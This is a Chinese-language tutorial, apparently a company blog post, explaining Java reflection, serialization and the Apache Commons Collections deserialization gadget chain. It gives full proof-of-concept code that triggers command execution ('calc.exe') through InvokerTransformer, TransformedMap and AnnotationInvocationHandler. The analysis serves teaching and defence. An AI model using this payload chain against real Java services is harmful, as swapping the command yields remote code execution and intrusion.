本篇文章為大家展示了Java中怎么實現(xiàn)反序列化漏洞,內容簡明扼要并且容易理解,絕對能使你眼前一亮,通過這篇文章的詳細介紹希望你能有所收獲。
安居網(wǎng)站建設公司創(chuàng)新互聯(lián)建站,安居網(wǎng)站設計制作,有大型網(wǎng)站制作公司豐富經(jīng)驗。已為安居上千多家提供企業(yè)網(wǎng)站建設服務。企業(yè)網(wǎng)站搭建\外貿(mào)營銷網(wǎng)站建設要多少錢,請找那個售后服務好的安居做網(wǎng)站的公司定做!
在Java中,可以通過java.lang.Runtime類方便的調用操作系統(tǒng)命令,或者一個可執(zhí)行程序。
public class RuntimeTest { public static void main(String[] args) throws Exception{ Runtime runtime = Runtime.getRuntime(); runtime.exec("calc.exe"); } }
如上代碼,可以打開windows系統(tǒng)的計算器。
反射機制允許程序在運行期借助于Reflection API取得任何類的內部信息,并能直接操作任意類和對象的所有屬性及方法。
要使用一個類,就要先把它加載到虛擬機中,在加載完類之后,堆內存的方法區(qū)中就產(chǎn)生了一個Class類型的對象(一個類只有一個class對象),這個對象就包含了完整的類的結構信息,我們可以通過這個對象看到類的結構,這個對象就像一面鏡子,透過鏡子可以看到類的結構,所以形象的稱之為:反射。
反射中會經(jīng)常使用到的方法:
1、獲取Class實例的方式 方式1:調用運行時類的屬性 .class 方式2:通過運行時的對象調用getClass() 方式3:調用Class的靜態(tài)方法:forName(String classPath) 方式4:使用類的加載器 classloader 2、創(chuàng)建運行時類的對象 newInstance() 調用此方法,創(chuàng)建對應的運行時類的對象 3、獲取運行時類的結構 getFields() 獲取當前運行時類及其父類中聲明為public訪問權限的屬性 getDeclaredFields() 獲取當前運行時類中聲明的所有屬性,不包含父類 getMethods() 獲取當前運行時類及其所有父類聲明為public的方法 getDeclaredMethods() 獲取當前運行時類中聲明的方法,不包含父類 getConstructors() 獲取當前運行時類聲明為public的構造器 getDeclaredConstructors() 獲取當前運行時類中聲明的所有構造器 invoke()方法允許調用包裝在當前Method對象中的方法
反射示例:
如下代碼中,Object i = m1.invoke(r1, 1, 2)的作用是:使用r1調用m1獲得的對象所聲明的公開方法即print,并將int類型的1,2作為參數(shù)傳入。
import java.lang.reflect.Method; public class test { public static void main(String[] args) { Reflect r1=new Reflect(); //通過運行時的對象調用getClass(); Class c=r1.getClass(); try { //getMethod(方法名,參數(shù)類型) //getMethod第一個參數(shù)是方法名,第二個參數(shù)是該方法的參數(shù)類型 //因為存在同方法名不同參數(shù)這種情況,所以只有同時指定方法名和參數(shù)類型才能唯一確定一個方法 Method m1 = c.getMethod("print", int.class, int.class); //相當于r1.print(1, 2);方法的反射操作是用m1對象來進行方法調用 和r1.print調用的效果完全相同 //使用r1調用m1獲得的對象所聲明的公開方法即print,并將int類型的1,2作為參數(shù)傳入 Object i = m1.invoke(r1, 1, 2); }catch (Exception e){ e.printStackTrace(); } } } class Reflect{ public void print(int a,int b){ System.out.println(a+b); } }
使用反射機制執(zhí)行命令:
此處invoke(runtime,"calc.exe")的作用為:使用runtime調用獲得的Method對象所聲明的公開方法即exec,并將calc.exe作為參數(shù)傳入,而runtime為獲取的Runtime.getRuntime實例對象。因此,此處代碼相當于執(zhí)行了Runtime.getRuntime( ).exec("calc.exe")。
熟悉這塊的操作,后面會以此完成攻擊鏈:
public class RuntimeTest { public static void main(String[] args) throws Exception { //forName(類名) 獲取類名對應的Class對象,同時將Class對象加載進來。 //getMethod(方法名,參數(shù)類型列表) 根據(jù)方法名稱和相關參數(shù),來定位需要查找的Method對象并返回。 //invoke(Object obj,Object...args) invoke允許調用包裝在當前Method對象中的方法 Object runtime=Class.forName("java.lang.Runtime").getMethod("getRuntime",new Class[]{}).invoke(null); //獲取一個Runtime的實例對象 //調用Runtime實例對象的exec()方法,并將calc.exe作為參數(shù)傳入 Class.forName("java.lang.Runtime").getMethod("exec",String.class).invoke(runtime,"calc.exe"); } }
如上,通過Java反射機制打開windows的計算器。
Java中為什么要使用反射機制,直接創(chuàng)建對象不是更方便?
如果有多個類,每個用戶所需求的對象不同,直接創(chuàng)建對象,就要不斷的去new一個對象,非常不靈活。而java反射機制,在運行時確定類型,綁定對象,動態(tài)編譯最大限度發(fā)揮了java的靈活性。
Java序列化是指把Java對象轉換為字節(jié)序列的過程,便于保存在內存、文件、數(shù)據(jù)庫中。
即:對象—>字節(jié)流 (序列化)
Java反序列化即序列化的逆過程,由字節(jié)流還原成對象。
即:字節(jié)流—>對象(反序列化)
序列化的好處在于可將任何實現(xiàn)了Serializable接口的對象轉換為字節(jié)數(shù)據(jù),使其保存和傳輸時可被還原。
反序列化的操作函數(shù):
java.io.ObjectOutputStream類中的writeObject( )方法可以實現(xiàn)Java序列化。
java.io.ObjectInputStream類中的readObject( )方法可以實現(xiàn)Java反序列化。
想一個Java對象是可序列化的,需要滿足相應的要求:
1、實現(xiàn)Serializable接口或Externalizable接口 2、當前類提供一個全局常量 serialVersionUID 3、必須保證其內部所有屬性也必須是可序列化的(默認情況下,基本數(shù)據(jù)類型可序列化) 4、ObjectInputStream和ObjectOutputStream不能序列化static和transient修飾的成員變量
Java反序列化示例:
import java.io.*; public class Serialize { public static void main(String[] args) throws Exception { //序列化 ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("hello.txt")); oos.writeObject(new String("序列化")); oos.close(); //反序列化 ObjectInputStream ois = new ObjectInputStream(new FileInputStream("hello.txt")); Object o = ois.readObject(); String s = (String) o; ois.close(); System.out.println(s); } }
反序列化漏洞成因:
序列化指把Java對象轉換為字節(jié)序列的過程,反序列化就是打開字節(jié)流并重構對象,那如果即將被反序列化的數(shù)據(jù)是特殊構造的,就可以產(chǎn)生非預期的對象,從而導致任意代碼執(zhí)行。
Java中間件通常通過網(wǎng)絡接收客戶端發(fā)送的序列化數(shù)據(jù),而在服務端對序列化數(shù)據(jù)進行反序列化時,會調用被序列化對象的readObject( )方法。而在Java中如果重寫了某個類的方法,就會優(yōu)先調用經(jīng)過修改后的方法。如果某個對象重寫了readObject( )方法,且在方法中能夠執(zhí)行任意代碼,那服務端在進行反序列時,也會執(zhí)行相應代碼。
如果能夠找到滿足上述條件的對象進行序列化并發(fā)送給Java中間件,Java中間件也會去執(zhí)行指定的代碼,即存在反序列化漏洞。
Java集合框架是對多個數(shù)據(jù)進行存儲操作的結構,其主要分為Collection和Map兩種體系:
Collection接口:單例數(shù)據(jù),定義了存取一組對象的方法的集合 Map接口:雙列數(shù)據(jù),保存具有映射關系“Key-value”的集合
Apache Commons Collections:一個擴展了Java標準庫里集合框架的第三方基礎庫。它包含有很多jar工具包如下圖所示,它提供了很多強有力的數(shù)據(jù)結構類型并且實現(xiàn)了各種集合工具類。
Apache Commons Collections反序列化漏洞的主要問題在于Transformer這個接口類,Transformer類可以滿足固定的類型轉化需求,其轉化函數(shù)可以自定義實現(xiàn),漏洞點就在這里。
目前已知實現(xiàn)了Transformer接口的類,如下所示。而在Apache Commons Collections反序列漏洞中,會使用到ChainedTransformer、ConstantTransformer、InvokerTransformer這三個類,這些類的具體作用我們在下面結合POC來看。在遠程調用前,我們先看本地的POC:
import org.apache.commons.collections.Transformer; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.collections.functors.ConstantTransformer; import org.apache.commons.collections.functors.InvokerTransformer; import org.apache.commons.collections.map.TransformedMap; import java.util.HashMap; import java.util.Map; public class ApacheSerialize1 { public static void main(String[] args) throws Exception { //1、創(chuàng)建Transformer型數(shù)組,構建漏洞核心利用代碼 Transformer[] transformers = new Transformer[]{ new ConstantTransformer(Runtime.class), new InvokerTransformer("getMethod", new Class[] {String.class, Class[].class }, new Object[] {"getRuntime", new Class[0] }), new InvokerTransformer("invoke", new Class[] {Object.class, Object[].class }, new Object[] {null, new Object[0] }), new InvokerTransformer("exec", new Class[] {String.class }, new Object[] {"calc.exe"}) }; //2、將transformers數(shù)組存入ChaniedTransformer類 Transformer transformerChain = new ChainedTransformer(transformers); //3、創(chuàng)建Map,給予map數(shù)據(jù)轉化鏈 Map innerMap = new HashMap(); innerMap.put("key", "value"); //給予map數(shù)據(jù)轉化鏈,該方法有三個參數(shù): // 第一個參數(shù)為待轉化的Map對象 // 第二個參數(shù)為Map對象內的key要經(jīng)過的轉化方法(可為單個方法,也可為鏈,也可為空) // 第三個參數(shù)為Map對象內的value要經(jīng)過的轉化方法(可為單個方法,也可為鏈,也可為空) Map outerMap = TransformedMap.decorate(innerMap, null, transformerChain); Map.Entry onlyElement = (Map.Entry) outerMap.entrySet().iterator().next(); //4、觸發(fā)漏洞利用鏈,利用漏洞 onlyElement.setValue("test"); } }
該POC從上至下大致分為四點,我們以此四點為基礎進行分析:
1、創(chuàng)建transformers數(shù)組,構建漏洞核心利用代碼。
2、將transformers數(shù)組存入ChaniedTransformer類。
3、創(chuàng)建Map,給予map數(shù)據(jù)轉化鏈
4、觸發(fā)漏洞利用鏈,利用漏洞
此處創(chuàng)建了一個Transformer類型的數(shù)組,其中創(chuàng)建了四個對象。這四個對象分別使用了ConstantTransforme和InvokerTransformer兩個類。
ConstantTransformer:把一個對象轉化為常量,并返回。
InvokerTransformer:通過反射,返回一個對象。
代碼如下:
此處,先不研究里面的具體參數(shù)有何作用,只需明確此處創(chuàng)建了一個Transformer類型的數(shù)組,其中創(chuàng)建了四個對象,我們接著往下看。
此處創(chuàng)建了一個ChainedTransformer對象,并將transformers數(shù)組作為參數(shù)傳入。
ChainedTransformer類:把一些transformer鏈接到一起,構成一組鏈條,對一個對象依次通過鏈條內的每一個transformer進行轉換。
繼續(xù)往下看。
此處代碼較多,我們拆開看。
先是創(chuàng)建Map類,添加了一組數(shù)據(jù)("key", "value")。前文有提到,Map是具有映射關系 Key-value的集合,一個鍵值對:kay-value構成了一個Entry對象。
接著是給予map實現(xiàn)類的數(shù)據(jù)轉化鏈。而在Apache Commons Collections中實現(xiàn)了TransformedMap類,該類可以在一個元素被添加/刪除/或是被修改時,會調用transform方法自動進行特定的修飾變換,具體的變換邏輯由Transformer類定義。即就是當數(shù)據(jù)發(fā)生改變時,可以進行一些提前設定好的操作。
也就是說,此處的代碼是給予Map數(shù)據(jù)轉化鏈,當Map里的數(shù)據(jù)發(fā)生改變時,會進行轉換鏈設定好的操作,如下有三個參數(shù):
此處TransformedMap調用了decorate( )方法,創(chuàng)建了TransformedMap對象。參數(shù)1 ,innerMap作為參數(shù)調用了父類AbstractInputCheckedMapDecorator的構造函數(shù),保存為this.map變量。參數(shù)2為null。參數(shù)3,transformerChain被初始化為this.valueTransformer變量。
TransformedMap類相關代碼如下:
然后獲取outerMap的第一個鍵值對(key,value),然后轉化成Map.Entry形式,前文也提到一個kay-value構成一個Entry對象。
最后利用Map.Entry取得第一個值,調用修改值的函數(shù),觸發(fā)下面的setValue( )代碼。
接著上面分析,繼續(xù)跟進setValue( )函數(shù),會進入到AbstractInputCheckedMapDecorator類。此時setValue( )方法會檢查要被修改的元素,進入到TransformedMap的轉換鏈。
跟進setValue()里的this.parent.checkSetValue(value),跳到TransoformedMap類,this.parent為TransformedMap類的對象outerMap。
AbstractInputCheckedMapDecorator類相關代碼如下:
跳到TransoformedMap類。
此時的this.valueTransformer就是transformerChain,之后就會觸發(fā)漏洞利用鏈。而transformerChain就是在上面POC第二點代碼生成的ChainedTransformer對象,其中傳入了transformers數(shù)組,transformers數(shù)組為POC第一點構造的漏洞利用核心代碼。
TransoformedMap類相關代碼如下:
由于valueTransformer為transformerChain,因此上面代碼中的this.valueTransformer.transform(value)會調用ChainedTransformer類的transform方法。
此時我們構造好的含有利用代碼的transformers數(shù)組會循環(huán)進入此處,先調用1次ConstantTransformer類,再調用3次InvokerTransformer類。
需要注意在數(shù)組的循環(huán)中,前一次transform函數(shù)的返回值,會作為下一次transform函數(shù)的object參數(shù)輸入。
ChainedTransformer類相關代碼如下:
第一次循環(huán):
首先是去調用ConstantTransformer類的transform方法,將Runtime.class保存為this.iConstant變量,并將返回值作為下一次transform函數(shù)的object參數(shù)輸入。
ConstantTransformer類相關代碼如下:
第二次循環(huán):
調用InvokerTransformer類的transform( )方法,此時transform的object參數(shù),即java.lang.Runtime。
先看InvokerTransformer的構造函數(shù):
第一個是字符串,是調用的方法名
第二個是個Class數(shù)組,是方法的參數(shù)的類型
第三個是Object數(shù)組,是方法的參數(shù)的具體值
進入到InvokerTransformer類的transform方法,非常明顯的反射機制。此處,input為transform的object參數(shù)為java.Lang.Runtime。
此處就相當于:
method = input.getClass().getMethod("getMethod", new Class[] {String.class, Class[].class).invoke("java.Lang.Runtime", new Object[] {"getRuntime", new Class[0]});
即java.Lang.Runtime.getMethod("getRuntime",null),返回一個Runtime.getRuntime( )方法,相當于產(chǎn)生一個字符串,但還沒有執(zhí)行"Rumtime.getRuntime( );"。
第三次循環(huán):
同樣進入到InvokerTransformer類的transform( )方法,input為上次循環(huán)的返回值Runtime.getRuntime( )。
此時就相當于:
method = input.getClass().getMethod("invoke", new Class[] {Object.class, Object[].class }).invoke("Runtime.getRuntime()", new Object[] {null, new Object[0]});
即Runtime.getRuntime( ).invoke(null)
,那么會返回一個Runtime對象實例。相當于執(zhí)行了完成了:
Object runtime=Class.forName("java.lang.Runtime").getMethod("getRuntime",new Class[]{}).invoke(null);
第四次循環(huán):
同樣進入到InvokerTransformer類的transform方法,input為上次循環(huán)的返回值Runtime.getRuntime( ).invoke(null)。
此時就相當于:
method = input.getClass().getMethod("exec", new Class[] {String.class }).invoke("runtime", new Object[] {"calc.exe"});
即Runtime.getRuntime( ).exec("calc.exe")。至此成功完成漏洞利用鏈,執(zhí)行系統(tǒng)命令語句,觸發(fā)漏洞。
最后整理整個過程:
1、transform數(shù)組里面含有4個實現(xiàn)了Transformer接口的對象,這四個對象都重寫了transform()方法
2、ChianedTransformer里面裝了4個transform,ChianedTransformer也實現(xiàn)了Transformer接口,同樣重寫了transform()方法
3、TransoformedMap綁定了ChiandTransformer,給予map數(shù)據(jù)轉化鏈,當map里的數(shù)據(jù)進行修改時,需經(jīng)過ChiandTransformer轉換鏈
4、利用TransoformedMap的setValue修改map數(shù)據(jù),觸發(fā)ChiandTransformer的transform()方法
5、ChianedTransformer的transform是一個循環(huán)調用該類里面的transformer的transform方法
loop 1:第一次循環(huán)調用ConstantTransformer("java.Runtime")對象的transformer方法,調用參數(shù)為"test"(正常要修改的值),返回了java.Runtime作為下一次循環(huán)的object參數(shù)
loop 2:第二次循環(huán)調用InvokerTransformer對象的transformer,參數(shù)為("java.Runtime"),包裝Method對象"getMethod"方法,invoke方法獲得對象所聲明方法"getRuntime",利用反射,返回一個Rumtime.getRuntime()方法
loop 3:第三次循環(huán)調用InvokerTransformer對象的transformer,參數(shù)為("Rumtime.getRuntime()"),包裝Method對象"invoke"方法,利用反射,返回一個Rumtime.getRuntime()實例
loop 4:第四次循環(huán)調用InvokerTransformer對象的transformer,參數(shù)為一個Runtime的對象實例,包裝Method對象"exec"方法,invoke方法獲得對象所聲明方法"calc.exe",利用反射,執(zhí)行彈出計算器操作
目前的POC只是被執(zhí)行了,我們要利用此漏洞,就需要通過網(wǎng)絡傳輸payload,在服務端對我們傳過去的payload進行反序列時執(zhí)行代碼。而且該POC的關鍵依賴于Map中某一項去調用setValue( ) ,而這完全不可控。
因此就需要尋找一個可序列化類,該類重寫了readObject( )方法,并且在readObject( )中進行了setValue( ) 操作,且這個Map變量是可控的。需要注意的時,在java中如果重寫了某個類的方法,就會優(yōu)先調用經(jīng)過修改后的方法。
在java中,確實存在一個類AnnotationInvocationHandler,該類重寫了readObject( )方法,并且執(zhí)行了setValue( )操作,且Map變量可控,如果可以將TransformedMap裝入這個AnnotationInvocationHandler類,再傳過去,服務端在對其進行反序列化操作時,就會觸發(fā)漏洞。最后利用的payload如下:
package Serialize; import org.apache.commons.collections.Transformer; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.collections.functors.ConstantTransformer; import org.apache.commons.collections.functors.InvokerTransformer; import org.apache.commons.collections.map.TransformedMap; import java.io.*; import java.lang.annotation.Target; import java.lang.reflect.Constructor; import java.util.HashMap; import java.util.Map; public class ApacheSerialize implements Serializable { public static void main(String[] args) throws Exception{ //transformers: 一個transformer鏈,包含各類transformer對象(預設轉化邏輯)的轉化數(shù)組 Transformer[] transformers = new Transformer[]{ new ConstantTransformer(Runtime.class), new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", new Class[0]}), new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, new Object[0]}), new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc.exe"}) }; //transformedChain: ChainedTransformer類對象,傳入transformers數(shù)組,可以按照transformers數(shù)組的邏輯執(zhí)行轉化操作 Transformer transformerChain = new ChainedTransformer(transformers); //Map數(shù)據(jù)結構,轉換前的Map,Map數(shù)據(jù)結構內的對象是鍵值對形式,類比于python的dict Map map = new HashMap(); map.put("value", "test"); //Map數(shù)據(jù)結構,轉換后的Map /* TransformedMap.decorate方法,預期是對Map類的數(shù)據(jù)結構進行轉化,該方法有三個參數(shù)。 第一個參數(shù)為待轉化的Map對象 第二個參數(shù)為Map對象內的key要經(jīng)過的轉化方法(可為單個方法,也可為鏈,也可為空) 第三個參數(shù)為Map對象內的value要經(jīng)過的轉化方法。 */ //TransformedMap.decorate(目標Map, key的轉化對象(單個或者鏈或者null), value的轉化對象(單個或者鏈或者null)); Map transformedMap = TransformedMap.decorate(map, null, transformerChain); //反射機制調用AnnotationInvocationHandler類的構造函數(shù) //forName 獲得類名對應的Class對象 Class cl = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler"); //通過反射調用私有的的結構:私有方法、屬性、構造器 //指定構造器 Constructor ctor = cl.getDeclaredConstructor(Class.class, Map.class); //取消構造函數(shù)修飾符限制,保證構造器可訪問 ctor.setAccessible(true); //獲取AnnotationInvocationHandler類實例 //調用此構造器運行時類的對象 Object instance=ctor.newInstance(Target.class, transformedMap); //序列化 FileOutputStream fileOutputStream = new FileOutputStream("serialize.txt"); ObjectOutputStream objectOutputStream = new ObjectOutputStream(fileOutputStream); objectOutputStream.writeObject(instance); objectOutputStream.close(); //反序列化 FileInputStream fileInputStream = new FileInputStream("serialize.txt"); ObjectInputStream objectInputStream = new ObjectInputStream(fileInputStream); Object result = objectInputStream.readObject(); objectInputStream.close(); System.out.println(result); } }
可以觸發(fā)。
我們來研究最終payload新加的部分:
新加部分代碼的前四部分不是很難理解。使用反射去調用AnnotationInvocationHandler類,并且指定了具體參數(shù)類型為(Class.class, Map.class)的構造器。之后再使用newInstance調用指定構造器運行時類的對象,并將(Target.class, transformedMap)作為參數(shù)傳入。
查看AnnotationInvocationHandler類,反射調用的構造器如下:
其中var1為Target.class,var2為transformedMap,var1.getInterfaces( )為獲取當前類顯式實現(xiàn)的接口,即獲取Target類顯式實現(xiàn)的接口。
Target類使用了@interface自定義注解,而@interface自定義注解自動繼承了java.lang.annotation.Annotation這一個接口,由編譯程序自動完成其他細節(jié)。因此符合if語句判斷,生成AnnotationInvocationHandler類實例。
Target類代碼如下:
進入payload序列化和反序列部分,主要是看反序列化的readObject( )部分,打開字節(jié)流并重構對象,此時的對象即AnnotationInvocationHandler類實例。
前文提到在java中如果重寫了某個類的方法,就會優(yōu)先調用經(jīng)過修改后的方法,而AnnotationInvocationHandler類重寫了readObject( )方法,因此反序列化時會優(yōu)先調用該類中的readObject( )方法。
跟進AnnotationInvocationHandler類的readObject( )方法,此時的var1為實例化的AnnotationInvocationHandler類對象,之后會觸發(fā)setValue( )造成命令執(zhí)行。
AnnotationInvocationHandler類相關代碼如下:
class AnnotationInvocationHandler implements InvocationHandler, Serializable { .................... AnnotationInvocationHandler(Class extends Annotation> var1, Mapvar2) { Class[] var3 = var1.getInterfaces(); if (var1.isAnnotation() && var3.length == 1 && var3[0] == Annotation.class) { //this.type為Target.class this.type = var1; //this.memberValues為transformedMap this.memberValues = var2; } else { throw new AnnotationFormatError("Attempt to create proxy for a non-annotation type."); } } ....................... private void readObject(ObjectInputStream var1) throws IOException, ClassNotFoundException { //1、defaultReadObject(),從var1讀取當前類的非靜態(tài)和非瞬態(tài)字段 var1.defaultReadObject(); AnnotationType var2 = null; try { //this.type為實例化時傳入的Target.class //2、getInstance獲取到@Target類的方法等基本信息。 var2 = AnnotationType.getInstance(this.type); } catch (IllegalArgumentException var9) { throw new InvalidObjectException("Non-annotation type in annotation serial stream"); } //3、獲取到Target類的注解元素 即{value:ElementType}鍵值對 Map var3 = var2.memberTypes(); //4、this.memberValues為實例化時傳入的transformedMap,獲取構造map的迭代器 Iterator var4 = this.memberValues.entrySet().iterator(); while(var4.hasNext()) { //獲取到map的第一個鍵值對 {value:test} Entry var5 = (Entry)var4.next(); //獲取到map第一個鍵值對 {value:test}的key 即value String var6 = (String)var5.getKey(); //從@Target的注解元素 {value:ElementType}鍵值對中去尋找鍵名為value的值 Class var7 = (Class)var3.get(var6); if (var7 != null) { //獲取到map第一個鍵值對 {value:test}的value 即test Object var8 = var5.getValue(); //isInstance表示var8是否能強轉為var7 instanceof表示var8是否為ExceptionProxy類型 //兩個都為否,進入到if條件語句內部 if (!var7.isInstance(var8) && !(var8 instanceof ExceptionProxy)) { //觸發(fā)setValue var5.setValue((new AnnotationTypeMismatchExceptionProxy(var8.getClass() + "[" + var8 + "]")).setMember((Method)var2.members().get(var6))); } } } } }
至此,完成漏洞利用。
在測試的時候,未使用AnnotationInvocationHandler類時,map可以put時key可以隨意設置,如上文POC中的map.put("key", "value")。
但在調用AnnotationInvocationHandler類時就必須設置為value。
主要原因如下:
需要注意的是在AnnotationInvocationHandler類相關代碼的var2 = AnnotationType.getInstance(this.type)部分,this.type為實例化時傳入的Target.class。
跟進,進入到AnnotationType類的getInstance( )方法,其中var2為var1返回該元素Target類型的注釋,而var1中沒有此注釋,返回null,進入到判斷語句,此時會實例化一個AnnotationType對象,并將var0作為參數(shù)傳入。
繼續(xù)跟進AnnotationType類的AnnotationType( ),其中var1為Target.class,此時獲取的Target類的全部方法等基本信息,其中this.memberTypes為獲取到的Target類的全部方法,而Target.class只定義了一個名為value的方法(快捷方式,限制了元素名必須為value)。
public class AnnotationType { ................... private AnnotationType(final Class extends Annotation> var1) { if (!var1.isAnnotation()) { throw new IllegalArgumentException("Not an annotation type"); } else { //獲取到Target.class的全部方法 Method[] var2 = (Method[])AccessController.doPrivileged(new PrivilegedAction() { public Method[] run() { return var1.getDeclaredMethods(); } }); //底層創(chuàng)建了長度是var2長度加1的一維數(shù)組,加載因子為1.0(擴容時才會用到) this.memberTypes = new HashMap(var2.length + 1, 1.0F); this.memberDefaults = new HashMap(0); this.members = new HashMap(var2.length + 1, 1.0F); Method[] var3 = var2; int var4 = var2.length; //遍歷var2,即獲取到的Target.class的全部方法 for(int var5 = 0; var5 < var4; ++var5) { Method var6 = var3[var5]; if (var6.getParameterTypes().length != 0) { throw new IllegalArgumentException(var6 + " has params"); } //獲取方法的名稱 String var7 = var6.getName(); //獲取方法的返回值類型 Class var8 = var6.getReturnType(); //將方法的名稱和返回值類型以鍵值對的形式傳入 //Target.class只有一個方法{value:ElementType} this.memberTypes.put(var7, invocationHandlerReturnType(var8)); this.members.put(var7, var6); Object var9 = var6.getDefaultValue(); if (var9 != null) { this.memberDefaults.put(var7, var9); } } if (var1 != Retention.class && var1 != Inherited.class) { JavaLangAccess var10 = SharedSecrets.getJavaLangAccess(); Map var11 = AnnotationParser.parseSelectAnnotations(var10.getRawClassAnnotations(var1), var10.getConstantPool(var1), var1, new Class[]{Retention.class, Inherited.class}); Retention var12 = (Retention)var11.get(Retention.class); this.retention = var12 == null ? RetentionPolicy.CLASS : var12.value(); this.inherited = var11.containsKey(Inherited.class); } else { this.retention = RetentionPolicy.RUNTIME; this.inherited = false; } } } ....................... public Map > memberTypes() { return this.memberTypes; } ....................... }
根據(jù)上面代碼追蹤到,this.memberTypes為獲取到的Target.class的全部方法,可以看到主要在String var6 = (String)var5.getKey( )為獲取到map第一個鍵值對{value:test}的key即value,var7會從獲取到Target的全部方法{value:ElementType}鍵值對中去尋找鍵名為var6的值,如果獲取不到就不會進入到setValue( )方法,因此必須設置map的key為value。
class AnnotationInvocationHandler implements InvocationHandler, Serializable { .................... //3、獲取到Target類的注解元素 即{value:ElementType}鍵值對 Map var3 = var2.memberTypes(); //4、獲取構造map的迭代器 Iterator var4 = this.memberValues.entrySet().iterator(); while(var4.hasNext()) { //獲取到map的第一個鍵值對 {value:test} Entry var5 = (Entry)var4.next(); //獲取到map第一個鍵值對 {value:test}的key 即value String var6 = (String)var5.getKey(); //從獲取到Target的全部方法 {value:ElementType}鍵值對中去尋找鍵名為value的值 Class var7 = (Class)var3.get(var6); if (var7 != null) { //獲取到map第一個鍵值對 {value:test}的value 即test Object var8 = var5.getValue(); //isInstance表示var8是否能強轉為var7 instanceof表示var8是否為ExceptionProxy類型 //兩個都為否,進入到if條件語句內部 if (!var7.isInstance(var8) && !(var8 instanceof ExceptionProxy)) { //觸發(fā)setValue var5.setValue((new AnnotationTypeMismatchExceptionProxy(var8.getClass() + "[" + var8 + "]")).setMember((Method)var2.members().get(var6))); } } .................... }
上述內容就是Java中怎么實現(xiàn)反序列化漏洞,你們學到知識或技能了嗎?如果還想學到更多技能或者豐富自己的知識儲備,歡迎關注創(chuàng)新互聯(lián)行業(yè)資訊頻道。